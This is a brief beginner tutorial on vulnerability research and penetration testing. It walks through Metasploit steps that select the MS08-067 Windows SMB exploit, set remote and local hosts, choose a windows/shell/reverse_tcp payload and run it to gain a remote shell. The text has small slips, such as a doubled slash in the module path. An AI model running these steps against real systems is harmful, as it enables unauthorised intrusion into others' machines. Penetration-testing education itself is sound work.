Vulnerability research is the key to a successful penetration testing, to successfully do this, required skills are:
– programming skills (c++, perl, python, assembly)
– reverse engineering
– instrumented tools
– exploitability and payload construction

Exploits are difficult for beginners, pubic exploits are provided for proof of concepts, and there is a collection of tool for exploits for penetration tester which is Metasploit.

There are a lot of exploits sites you can search online. To use Metasploit, you need to use msfconsole.

Steps:
1. type msfconsole on your kali Linux terminal
2. type which operating system you want to exploit (e.g. use windows/smb//ms08_067_netapi
3. type RHOST and LHOST to set your remotehost and localhost respectively (set RHOST/LHOST [ip address])
4. set your payload (e.g. set PAYLOAD windows/shell/reverse_tcp)
5. after you are done, type exploit and then you can access your remote operating system.